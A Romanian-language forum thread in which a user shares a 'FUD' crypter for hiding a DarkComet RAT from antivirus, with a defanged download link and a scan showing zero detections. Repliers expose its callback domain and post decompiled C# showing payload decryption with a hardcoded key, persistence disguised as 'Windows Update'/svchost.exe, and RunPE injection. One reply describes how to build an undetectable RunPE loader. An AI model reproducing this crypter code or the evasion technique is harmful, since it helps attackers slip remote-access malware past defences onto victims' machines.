Jump to content
Netscape

[Sample][Crypter] Brick Crypter (2014 Version) (0/37)

Recommended Posts

2lwavjn.jpg

Brick Crypter (obfuscate)

Nu e cine stie ce la optiuni, dar e FUD.

Download: hxxp://up.ht/KmrYlO

Scan RAT (DarkComet):

Total Results: 0/35

L-am luat de pe un forum.

#Usr

fisierul de mai sus este infectat, descarcati doar pt analiza

nu e al tau, netscapedev.zapto.org :o

Edited by Usr6
Link to comment
Share on other sites

Pentru ce ma, l-am luat de pe HF sectiunea VIP. Nu e vina mea, mie mi s-a deschis. Hai salut.

Cica lui i s-a deschis =)))

Cum sa ti se deschida mai copile cand codu e asa:

lURQsyP.png

m0001 fiind chestia care descripteaza

m0004 e add to startup

si m0005 e runpe.inject =)

In fine, merci de RunPE, mai rar gasesti unu FUD.

Link to comment
Share on other sites

Merci frate merge crypteru de rupe:

fake.png

eu la decompilare am obtinut asta:

using System.Text;

namespace _5cku0up7zblm4m6s

{

internal class Program

{

private static void Main(string[] args)

{

_icohsk6upujjb2br icohsk6upujjb2br = new _icohsk6upujjb2br();

_c2kysru1o76t79dj c2kysru1o76t79dj = new _c2kysru1o76t79dj();

_dq1y0opsmshbq9uq dq1y0opsmshbq9uq = new _dq1y0opsmshbq9uq();

_11njsybv4w2kunao obj = new _11njsybv4w2kunao();

byte[] bytes = c2kysru1o76t79dj._hp9vnnz21nl1hn26();

icohsk6upujjb2br._5bsrntzkh6p9uyd8(ref bytes, Encoding.ASCII.GetBytes("WPBmyKVH2XpVoS5TMiAtW4hv6arHDB7S"));

obj._cx2tvinuqdmp9zhr("Windows Update (x86)", "svchost.exe");

dq1y0opsmshbq9uq._7t5bwu0kos4h36yr(bytes);

}

}

}

+ restu de functii si alte coduri, dau pe privat la cine vrea.

Oricum trebuie sa te felicit pentru efortul depus pentru al face FUD.

Link to comment
Share on other sites

Cica lui i s-a deschis =)))

Cum sa ti se deschida mai copile cand codu e asa:

lURQsyP.png

m0001 fiind chestia care descripteaza

m0004 e add to startup

si m0005 e runpe.inject =)

In fine, merci de RunPE, mai rar gasesti unu FUD.

Poti face foarte usor un RunPE FUD... Faci un DLL cu RunPE-ul in el, il bagi cryptat in output, il decryptezi la pornire si ii dai invoke la metoda.

Si-mi place cat s-a chinuit el sa se uite prin codul RunPE-ul-ui, "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", oare ce face cu astia care au Windows-ul in alta partitie, ca mine:)

Edited by yes1234
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...